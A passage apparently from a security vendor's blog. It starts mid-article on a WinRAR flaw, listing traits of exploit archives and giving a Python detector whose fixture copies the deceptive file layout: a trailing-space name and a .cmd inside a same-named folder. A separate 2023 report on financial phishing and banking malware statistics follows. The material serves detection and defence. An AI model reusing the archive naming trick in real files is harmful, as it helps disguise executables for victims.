This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.

Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:

  • ZIP archives;
  • RAR archives.

The variations in malware and existing archives make it impossible to determine definitively whether an archive is an exploit. However, we can identify key characteristics of an exploit:

  • The archive contains files whose names match those of subdirectories.
  • At least one file name contains a space before the extension.
  • The archive must contain an executable located inside the subdirectory.

Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:

For RAR files, like this:

Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.
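A structural check for ZIP archives built from the three characteristics listed above (an added example, not code from the post): it lists the entries, derives the directories they imply, and reports name/directory collisions, a space before the extension, and executables inside a colliding directory. The executable-extension list and the two fixture archives (harmless placeholder content) are assumptions; for ZIP, entry names stay readable even in password-protected archives, so the check still applies, while a RAR with encrypted headers would need the behaviour analysis the post mentions.

```python
"""Constructed detector for the archive layout described above. Fixtures contain
placeholder text only; the check is over names, not contents."""
import io
import posixpath
import re
import zipfile

# Assumed set of extensions treated as "executable" for the third characteristic.
EXECUTABLE_EXT = {".exe", ".cmd", ".bat", ".com", ".scr", ".ps1", ".vbs", ".js", ".lnk"}
SPACE_BEFORE_EXT = re.compile(r" \.[^./\\]+$")   # "name.pdf .cmd": a space right before ".cmd"


def assess_zip(data: bytes) -> dict:
    """Return per-characteristic evidence and a verdict for one ZIP archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    names = [i.filename for i in infos]
    # Bit 0 of the general-purpose flag marks encrypted entries; names remain visible.
    encrypted = any(i.flag_bits & 0x1 for i in infos)
    files = [n for n in names if not n.endswith("/")]
    dirs = {n.rstrip("/") for n in names if n.endswith("/")}
    for n in files:                       # directories implied by nested entries
        parts = n.split("/")
        dirs.update("/".join(parts[:k]) for k in range(1, len(parts)))
    # 1. a file whose full name equals a directory name
    name_dir_collisions = sorted(f for f in files if f in dirs)
    # 2. a file name with a space immediately before its extension
    space_before_ext = sorted(f for f in files if SPACE_BEFORE_EXT.search(posixpath.basename(f)))
    # 3. an executable placed inside one of the colliding directories
    executables_in_collision_dir = sorted(
        f for f in files
        if posixpath.dirname(f) in name_dir_collisions
        and posixpath.splitext(f)[1].lower() in EXECUTABLE_EXT)
    return {
        "encrypted": encrypted,
        "name_dir_collisions": name_dir_collisions,
        "space_before_ext": space_before_ext,
        "executables_in_collision_dir": executables_in_collision_dir,
        "exploit_like": bool(name_dir_collisions and space_before_ext
                             and executables_in_collision_dir),
    }


def build_fixture(entries: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}; used only for the constructed fixtures."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in entries.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed fixtures. The first mirrors the layout described above with
# placeholder text in every entry; the second is an ordinary archive.
SUSPICIOUS_ZIP = build_fixture({
    "invoice.pdf ": b"%PDF-1.4 placeholder",
    "invoice.pdf /invoice.pdf .cmd": b"rem placeholder text, not a payload",
})
BENIGN_ZIP = build_fixture({
    "invoice.pdf": b"%PDF-1.4 placeholder",
    "notes/readme.txt": b"hello",
})

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_ZIP), ("benign", BENIGN_ZIP)):
        print(label, assess_zip(blob))
```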

Conclusions and advice

In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:

  • Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.
  • Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed solutions can assist you in this endeavor.
  • Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your employees. We recommend our Kaspersky NEXT suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.

Financial cyberthreats in 2023

6 May, 2024 - 12:00

Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With trillions of dollars of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.


In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).

Key findings

Phishing

  • Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.
  • Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.
  • PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.
  • Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.

PC malware

  • The number of users affected by financial malware for PCs dropped by 11% from 2022.
  • Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.

Mobile malware

  • The number of Android users attacked by banking malware increased by 32% compared to the previous year.
  • Agent was the most active mobile malware family, making up 38% of all Android attacks.
  • Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.

Financial phishing

In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.

This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.

TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users’ devices, 2023 (download)

TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2023 (download)

Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).

Distribution of financial phishing pages by category, 2023 (download)

Online shopping scams

Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.

TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (download)

The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.

Sample of a phishing site that impersonates Amazon

The tenth most-copied site was the Latin American online market MercadoLibre, which was mimicked by 1.77% of phishing pages. Fake sites also frequently targeted Louis Vuitton (5.52%), Shopify (4.73%), Alibaba Group (3.17%), Spotify (3.14%), eBay (3.12%) and Luxottica (2.94%) users.

Phishing pages impersonating AliExpress, Spotify and Louis Vuitton websites

One of the most common scam types targeting online shoppers consists of cybercriminals offering heavy discounts (which, of course, expire soon), special offers, early access to goods or entertainment, and other “bargains”. Both home users and businesses were targeted. For instance, in the screenshot below, a fake page presumably is offering a bus at an attractive price. If the user attempts to buy the vehicle, they are prompted to log in with their eBay account, which is then stolen.

Fake page offering a bus at a relatively low price

Fraudsters use similar scams on social networks. For example, in the screenshot below, a fake Instagram store is offering Louis Vuitton products.

Fake Louis Vuitton store on Instagram

As new and more secure authentication technologies appear, scammers find ways to evade these, too. The phishing page in the screenshot below, mimicking the Shopify sign-in form, implements a scenario for when the victim uses a passkey as the authentication method. Passkeys can only be used on the websites and apps they were created for, and to authorize passkey authentication the user has to unlock the device the passkey was issued for. That means passkeys are of no use to phishers. To trick users into choosing to authenticate with a manually entered one-time code instead, the fake page displays an error message.

Fake Shopify page trying to bypass passkey authentication

Payment system phishing

Payment systems were mimicked in 19.88% of financial phishing attacks detected and blocked by Kaspersky products in 2023.

TOP 5 payment systems mimicked by phishing and scam pages (download)

Among these, PayPal (54.73%) was the one that received the most attention, with more than half of attacks using its image.

Fake page targeting PayPal users

Other frequently mimicked payment systems included MasterCard (16.58%), Visa (8.43%), Interac (4.05%) and PayPay (2.96%). Notably, of these, Visa and MasterCard are typically mimicked on fake payment pages linked to a variety of phishing and scam sites.

Cryptocurrency scams

In 2023, the number of phishing and scam attacks relating to cryptocurrencies continued to grow. Kaspersky antiphishing technologies prevented 5 838 499 attempts to follow a cryptocurrency-themed phishing link, which is 16% more than in 2022. This may be due to the fact that the Bitcoin rate, after hitting rock bottom in 2022, started to climb again in 2023. With the price of the number-one cryptocurrency setting new records at the beginning of 2024, this trend can be expected to develop further.

We have seen a number of different cryptocurrency-related schemes throughout the year. Scammers impersonated well-known cryptocurrency exchanges and offered coins in the name of major companies. Among the most notable schemes was a phishing campaign that targeted hardware crypto cold wallets. This type of wallet, normally disconnected from the internet, is considered quite safe. However, under the guise of a crypto giveaway, the attackers tricked users into connecting their hardware wallets to a fake website.

We have also seen crypto wallet phishing using well-known non-cryptocurrency brands as a lure. For example, a phishing website bearing the Apple logo and photos of Apple products invited users to get cryptocurrency called “AppleCoin”. Interestingly, a coin under that name does exist, but it has nothing to do with Apple Inc.

Phishing website touting AppleCoin in the name of Apple Inc

If the user believes that Apple has at last issued its own cryptocurrency and enters their wallet credentials, the scammers grab their funds.

PC malware

In 2023, the decline in the number of users affected by financial PC malware continued. Our data showed a decrease from 350,808 in 2022 to 312,453 in 2023, reflecting an 11% drop. This trend has persisted for several years, and there are several reasons for it. First, users increasingly prefer mobile banking, and sign in to their online bank accounts on PCs less frequently than on smartphones. Second, although users may still store their banking credentials in browsers on their desktop computers, most notorious banking malware for PCs has been repurposed to deliver other malware, such as ransomware, to infected systems. Often, these banking Trojans are used in more sophisticated targeted attacks, which usually means they infect fewer users.

Changes in the number of unique users attacked by banking malware in 2023 (download)

As can be seen in the graph above, banking malware attacks spiked in March. This coincided with a fourfold increase in Emotet’s activity, which was its last large-scale campaign observed in 2023.

Key banking malware actors

The notable strains of banking Trojans in 2023 included Ramnit (35.1%), Zbot (22.5%) and Emotet (16.2%), which remained the top three financial malware families for the PC. The percentages of all three grew compared to 2022, together comprising nearly three-quarters of all financial malware attacks on desktop computers.

Name             Verdict                              %*
Ramnit/Nimnul    Trojan-Banker.Win32.Ramnit           35.1
Zbot/Zeus        Trojan-Banker.Win32.Zbot             22.5
Emotet           Trojan-Banker.Win32.Emotet           16.2
CliptoShuffler   Trojan-Banker.Win32.CliptoShuffler    6.9
Danabot          Trojan-Banker.Win32.Danabot           2.2
Tinba            Trojan-Banker.Win32.Tinba             2.1
SpyEyes          Trojan-Spy.Win32.SpyEye               1.9
Qbot/Qakbot      Trojan-Banker.Win32.Qbot              1.8
BitStealer       Trojan-Banker.Win32.BitStealer        1.3
IcedID           Trojan-Banker.Win32.IcedID            1.2

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware

These three Trojans have a range of capabilities apart from stealing banking credentials. They can download additional modules and third-party malware, collect various types of data, such as passwords stored in browsers, and perform other malicious activities.

Fourth and fifth were CliptoShuffler (6.9%) and Danabot (2.2%), both frequently appearing in the rankings, and in sixth place was Tinba (2.2%), also known as “Tiny Banker Trojan”. Although we have not seen this family among the most active banking Trojans in previous years, it dates back to 2012, and its source code has been leaked. It is written in Assembler and gets its name from its remarkably small size.

Among other most active banking malware types were SpyEyes (1.9%), QakBot (1.8%), BitStealer (1.3%) and IcedID (1.2%).

Brazilian malware

While the overall number of desktop financial malware attacks has steadily declined, we have observed a trend for Brazilian families attempting to fill the void. In the beginning of 2023, we shared insights into new functionality added to Prilex, a type of malware known to target ATMs and PoS (point of sale) terminals. Kaspersky experts found the new modification was specifically designed to exploit contactless payments. When someone tries to pay with a contactless card, the infected PoS terminal displays an error message, prompting the buyer to insert the card and thus helping attackers to capture sensitive payment details. Cybercriminals can then run unauthorized transactions and potentially steal large sums of money from unsuspecting victims.

Another interesting malware strain is GoPIX, which targets the Brazilian instant payment system PIX. It spreads by impersonating the WhatsApp web app. Once successfully installed, it starts monitoring clipboard contents. If the malware detects PIX transaction data, it substitutes it with malicious data, tricking the user into transferring money to cybercriminals. It targets Bitcoin and Ethereum transactions in the same manner.

Recently, our Global Research and Analysis Team (GReAT) discovered Coyote, a new banking Trojan of Brazilian origin. Targeting more than 60 banking institutions, primarily in Brazil, this malware uses a sophisticated infection chain that utilizes various relatively new technologies. Spreading via the Squirrel installer, it leverages a NodeJS environment and the Nim programming language to complete infection. Coyote is capable of keylogging, taking screenshots, and setting up fake pages to steal user credentials.

Geography of PC banking malware attacks

To highlight the countries where financial malware was most prevalent in 2023, we calculated the share of users who encountered banking Trojans in the total number attacked by any type of malware in the country. The following statistics indicate where users are most likely to encounter financial malware.

The highest share of banking Trojans was registered in Afghanistan (6%), Turkmenistan (5.2%) and Tajikistan (3.7%). Switzerland (3.2%) and Mauritania (3%) were also among the worst affected by this type of threats.

TOP 20 countries by share of attacked users

Country*        %**
Afghanistan     6
Turkmenistan    5.2
Tajikistan      3.7
China           3.2
Switzerland     3
Mauritania      2.4
Sudan           2.3
Egypt           2.2
Syria           2.1
Yemen           2
Paraguay        2
Algeria         1.9
Venezuela       1.9
Uzbekistan      1.7
Libya           1.7
Zimbabwe        1.7
Spain           1.6
Pakistan        1.6
Iraq            1.6
Thailand        1.5

* Excluded are countries and territories with relatively few (under 10,000) Kaspersky users.
** Unique users whose computers were targeted by financial malware as a percentage of all Kaspersky users who encountered malware in the country.

Types of attacked users

Consumers (61.2%) were the main target of financial malware attacks in 2023, with their share unchanged from 2022.

Financial malware attack distribution by type (corporate vs consumer), 2021–2022 (download)

Mobile Malware

In 2023, 32% more Android users encountered mobile banking malware than in the previous year: 75,521 attacks compared to 57,219 in 2022. Moreover, we observed notable growth in the number of affected users in the last quarter of the year, which may be due to a new financial malware family called Mamont that targets mainly users in the CIS.

Number of Android users attacked by banking malware by month, 2022–2023 (download)

The most active Trojan banker was Bian.h (22.22%), followed by Agent.eq (20.95%), whose share grew by 17.50 pp compared to 2022. Third was Faketoken.pac, which affected 5.33% of all users who encountered mobile financial threats in 2023.

Verdict                                 %*, 2022   %*, 2023   Difference in pp   Change in ranking
Trojan-Banker.AndroidOS.Bian.h          23.78      22.22      -1.56              0
Trojan-Banker.AndroidOS.Agent.eq         3.46      20.95      +17.50             +6
Trojan-Banker.AndroidOS.Faketoken.pac    6.42       5.33      -1.09              +1
Trojan-Banker.AndroidOS.Agent.cf         1.16       4.84      +3.68              +13
Trojan-Banker.AndroidOS.Agent.ma         0.00       3.74      +3.74
Trojan-Banker.AndroidOS.Agent.la         0.04       3.20      +3.16
Trojan-Banker.AndroidOS.Anubis.ab        0.00       3.00      +3.00
Trojan-Banker.AndroidOS.Agent.lv         0.00       1.81      +1.81
Trojan-Banker.AndroidOS.Agent.ep         4.17       1.74      -2.44              -4
Trojan-Banker.AndroidOS.Mamont.c         0.00       1.67      +1.67

* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.

Geography of the attacked mobile users

To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.

TOP 10 countries by number of users who encountered mobile banking malware, 2023:

Country*        %**
Turkey          2.98%
Saudi Arabia    1.43%
Spain           1.38%
Switzerland     1.28%
India           0.60%
Japan           0.52%
Italy           0.42%
South Korea     0.39%
Azerbaijan      0.24%
Colombia        0.24%

* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.


Although the number of users affected by PC banking malware continues to decline, there are other financial threats that underscore the need to stay vigilant and protect your digital assets. Unlike 2022, the year 2023 saw the number of users encountering mobile banking Trojans increase significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the nearest future.

To protect your devices and finance-related accounts:

  • Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.
  • Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.
  • Download apps only from trusted sources, such as official app marketplaces.
  • Use reliable security solutions capable of preventing both malware and phishing attacks.

To protect your business:

  • Regularly update your software and install security patches in a timely manner.
  • Improve your employees’ security awareness, conduct regular security training and encourage safe practices, such as proper account protection.
  • Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.
  • Implement network segmentation and default deny policies for users with access to financial assets.
  • Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.